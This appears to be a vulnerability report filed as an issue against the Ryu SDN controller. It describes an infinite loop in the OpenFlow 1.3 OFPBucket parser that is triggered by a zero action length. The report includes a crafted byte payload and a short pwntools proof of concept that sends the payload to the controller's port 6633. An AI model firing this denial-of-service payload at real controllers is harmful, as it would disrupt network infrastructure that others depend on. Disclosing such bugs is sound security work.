Suggestion for OFPBucket parser will cause an infinite loop #194
Description
in /ryu/ofproto/ofproto_v1_3_parser.py about line=3607
class OFPBucket(StringifyMixin):
@classmethod
def parser(cls, buf, offset):
(len_, weight, watch_port, watch_group) = struct.unpack_from(
ofproto.OFP_BUCKET_PACK_STR, buf, offset)
....
while length < msg.len:
action = OFPAction.parser(buf, offset)
msg.actions.append(action)
offset += action.len
length += action.lenIf action.len=0,the offset and length will no longer change and the parsing will fall into an infinite loop.
payload:
payload="\x04\x13\x00\x38\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x0000\x28\x00\x00\x00\x00\x00\x00\x00\x20\x00\x01\xff\xff\xff\xffff\xff\xff\xff\x00\x00\x00\x00\x00\x19\x00\x00\x80\x00\x08\x0600\x00\x00\x00\x00\x00\x00\x00"
poc:
from pwn import *
p=remote("0.0.0.0",6633)
payload="\x04\x13\x00\x38\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x0000\x28\x00\x00\x00\x00\x00\x00\x00\x20\x00\x01\xff\xff\xff\xffff\xff\xff\xff\x00\x00\x00\x00\x00\x19\x00\x00\x80\x00\x08\x0600\x00\x00\x00\x00\x00\x00\x00"
p.send(payload)
p.interactive()This POC uses OFPGroupDescStatsReply as an example. The OFPGroupDescStatsReply message will be accompanied by an OFPGroupDescStats structure, and the OFPGroupDescStats will be accompanied by an OFPBucket , in which the length of OFPAction is tampered with to 0.
However, please note that not all OFPActions will be assigned a length according to the length variable of the message when they are parsed. In this example, OFPActionSetField is used for demonstration.